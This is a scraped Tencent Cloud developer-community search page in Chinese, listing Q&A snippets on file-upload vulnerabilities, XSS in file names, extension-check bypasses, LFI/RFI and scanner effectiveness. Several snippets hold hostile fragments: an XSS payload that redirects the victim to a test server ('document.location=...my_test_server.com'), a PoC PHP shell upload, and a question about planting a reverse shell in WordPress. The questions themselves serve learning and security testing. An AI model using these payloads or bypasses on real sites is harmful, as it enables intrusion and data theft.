腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
是否有权威的
漏洞
分类?
是否对
漏洞
进行了分类?但我没有找到权威的
漏洞
分类。在Web应用程序
漏洞
之下,应该有XSS/SSRF/XXE...。
浏览 0
提问于2020-09-09
得票数 0
回答已采纳
1
回答
PHP,它提供什么安全性?
、
如果我不能使用它(我做了
上传
,但不是通过帖子),所以我必须使用rename功能,我需要采取什么安全措施? 编辑 @Pekka要求我详细说明我打算如何
上传
该
文件
。我将通过Ajax
上传
文件
,并且我有一些用于
上传
倍数
文件
的队列功能。因此,我正在使用php://input流。如果我正确地理解了Pekka的答案,我就没有什么好担心的了,因为我将该
文件
作为一个流,并且我不会复制任何临时
文件
。如果我错了,请纠正我
浏览 0
提问于2012-08-12
得票数 1
回答已采纳
3
回答
不使用/利用
文件
名中的XSS
、
、
我试图利用
文件
上传
的
文件
名字段中的
漏洞
进行攻击。web应用程序无法正确验证
上传
文件
的
文件
名,因此存在存储的跨站点脚本
漏洞
。我的问题是,每当我试图重命名
文件
以包含类似于下面的有效负载时,我就不能在
文件
名中包括/。 document.location='http://my_test_server.com/bla.php?甚至有可能利用这个
漏洞
吗?
浏览 0
提问于2018-04-19
得票数 2
回答已采纳
1
回答
来自XSS的LFI还是RFI?
、
、
XSS能引导我们找到本地
文件
包含还是远程
文件
包含?我读过一篇文章,它可以通过XSS
漏洞
上传
shell,但我仍然不知道它是如何实现的。
浏览 0
提问于2012-06-06
得票数 1
回答已采纳
1
回答
最后带有特殊字符的PHP执行
、
、
我试图复制这个
漏洞
: 根据解释,可以绕过Wordpress插件中的检查,在php扩展后添加一个特殊的char。我正在尝试攻击,
文件
上传
时名为shell.php<special_char>,包含一个简单的php代码<?php echo "poc"; ?>。 然后,我应该在<target>/....在哪种情况下,可以利用允许
上传
扩展名为p
浏览 0
提问于2020-12-22
得票数 1
2
回答
如何避免
文件
上传
函数中的路径或目录操作?
、
、
在我正在做的
文件
上传
功能中,一个重要的问题是我可以保存图像用户
上传
的路径。在下面的代码中,我已经在基于web的应用程序
文件
夹中指定了保存
上传
文件
的
文件
夹。我的指导员告诉我,在asp.net UploadFile控件的代码后面还有一个安全
漏洞
,我不知道为什么!= @"~\Images\"; string comPath = Server.MapPath(path + "\\" + FileUpload1.File
浏览 4
提问于2013-03-20
得票数 2
2
回答
在易受攻击的服务器上执行
上传
的php脚本,如果我知道它的位置?
、
、
我需要测试一个网站,我发现一个脆弱的
文件
上传
。只检查
文件
扩展名是.jpg、.png还是.pdf。我可以通过
上传
一个名为script.php.jpg的
文件
来绕过这个问题。我知道
上传
的
文件
存储在/uploads中。 我怎样才能执行那个脚本?在浏览器中键入http://example.com/uploads/script.php.jpg时,脚本不会执行。我知道服务器可以执行php代码,服务器有
文件
漏洞
浏览 0
提问于2018-06-24
得票数 1
1
回答
multer的
上传
文件
漏洞
、
我正在使用multer在我的应用程序中
上传
文件
。我只想确认一下,是否存在
文件
易受攻击的风险?请发表意见。
浏览 19
提问于2019-12-26
得票数 4
1
回答
文件
上传
安全
漏洞
、
我的代码中有没有
文件
上传
的安全
漏洞
?我在我的服务器端使用apache。在php.ini
文件
中启用了
文件
上传
。 <?
浏览 5
提问于2012-01-07
得票数 0
回答已采纳
1
回答
通过EXIF注释
上传
.JPEG
文件
外壳程序
、
、
我最近遇到了这个咨询,我对这两个
漏洞
都感到有点困惑,特别是
文件
上传
漏洞
。我不明白如何实际利用这个条件(甚至是为什么它作为一个条件存在)。这个
漏洞
实际上是一个
漏洞
吗?或者,它只是一个PoC,显示您可以
上传
东西内部的东西(但实际上并不是利用它们)?
浏览 0
提问于2013-04-29
得票数 10
回答已采纳
1
回答
W3af vs手动渗透测试
与手动查找
漏洞
相比,w3af等工具在查找web应用程序
漏洞
方面的效率如何?他们是否能够找到OWASP前10名中的所有
漏洞
,如反射xss、持久xss、sqli、lfi/rfi和不受限制的
文件
上传
?还是会有一些
漏洞
从裂缝中掉下来,仍然没有被发现?
浏览 0
提问于2014-11-27
得票数 0
3
回答
W3af和自动
漏洞
扫描器与手动测试
、
与手动查找
漏洞
相比,像w3af这样的工具在查找web应用程序
漏洞
方面有多有效?他们是否能够从OWASP前10名中找到所有
漏洞
,如反射xss、持久xss、sqli、lfi/rfi和不受限制的
文件
上传
?还是会有一些
漏洞
从裂缝中掉下来,而仍未被发现?
浏览 0
提问于2014-11-27
得票数 3
1
回答
漏洞
,远程代码执行,利用代码
、
、
、
我想知道利用以下
漏洞
的代码。 这是uploading file普通
文件
上传
吗? 例如,下面的代码。
浏览 0
提问于2018-11-27
得票数 0
回答已采纳
2
回答
不受限制的
文件
上传
-可能的攻击
、
、
、
在IIS服务器+ MYSQL上进行渗透测试(练习)期间,我发现了一个不受限制的
文件
上载
漏洞
,我可以为此上载.php
文件
。因此,我尝试使用passthru或exec命令
上传
php,但我收到了著名的响应“无法分叉.”因为,据我所知,我
上传
文件
的
文件
夹具有某种安全保护,避免命令的执行。尽管如此,我还是
上传
了一个.php
文件
,以便使用fopen、fread等命令读取示例
文件
,并且我已经成功地完成了它。 因此,我的问题是:为了
浏览 0
提问于2013-12-18
得票数 3
1
回答
如果启用了目录列表,是否可以将反向shell远程上载到网站?
如果网站中存在目录列表
漏洞
,我可以将PHP反向shell上载到WordPress网站吗?条件是我可以在一个/wp-includes网站中看到WordPress的整个
文件
结构,并且我希望在/wp-includes目录中
上传
一个PHP,这样我就可以得到一个反向连接。 有可能吗?
浏览 0
提问于2020-12-31
得票数 -4
回答已采纳
1
回答
PHP
文件
副本()不在IIS 6上工作
、
、
下面的代码试图将用户从表单中获取
文件
的输入,并将其
上传
到and服务器。我已经设置了PHP.INI
文件
,以便upload_tmp_dir = "C:\Temp“<form method="POST" action="do_upload.php="img1" size="30"> <input type="submit" name="BtnUpload&quo
浏览 3
提问于2013-11-01
得票数 0
回答已采纳
2
回答
文件
上传
(哪种类型的
文件
)
、
、
、
当我学习关于
文件
上传
漏洞
的时候,一个问题浮现在我的脑海中。在搜索
文件
上载
漏洞
时使用哪种类型的
文件
?是否需要检测后端使用哪种编程语言?大多数示例中都使用Php扩展名
文件
。
浏览 0
提问于2022-05-17
得票数 1
5
回答
用php编辑
文件
的所有方法?(安全)
、
、
、
、
我的网站有一些严重的安全
漏洞
。在保护the服务器之后,我现在将保护我的php
文件
。 因此,我想知道由于我的php脚本中的
漏洞
,所有的方法都可能被用来
上传
或编辑php
文件
。
浏览 1
提问于2011-03-13
得票数 1
回答已采纳
1
回答
WordPress网站的mail()函数有多大的安全风险?
、
、
我听说过骇客可以将恶意php脚本
上传
到WordPress目录中,并使用它们从服务器发送数千封垃圾邮件的恐怖故事。如果Nginx配置正确,所有WordPress目录都由拥有750个权限的"www-data“用户和组拥有,那么黑客如何才能将php脚本
上传
到WordPress呢?
浏览 0
提问于2018-08-14
得票数 0
1
回答
为什么“图像
文件
上的MIME类型不匹配”是一个安全
漏洞
?
、
一些安全
漏洞
扫描器( Ratproxy )检测到名为“图像
文件
上的MIME类型不匹配”的
漏洞
。我发现的是,在存在此
漏洞
的地方,可以将Javascript嵌入到PNG
文件
中,
上传
到站点,并以某种方式在PNG
文件
中执行Javascript。 ,您能用一个例子来解释攻击者如何利用这种
漏洞
吗?是否需要web客户端(例如浏览器)也有一个
漏洞
来利用这个web应用程序
漏洞
,还是它完全依赖于web应用程序?
浏览 0
提问于2013-06-28
得票数 2
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
DedeCMS V5.7 SP2前台文件上传漏洞
文件上传漏洞
文件上传漏洞详解1
DVWA搭建与文件上传漏洞演示
QYKCMS后台任意文件上传、任意文件读取漏洞
热门
标签
更多标签
云服务器
ICP备案
对象存储
实时音视频
云直播
活动推荐
运营活动
广告
关闭
领券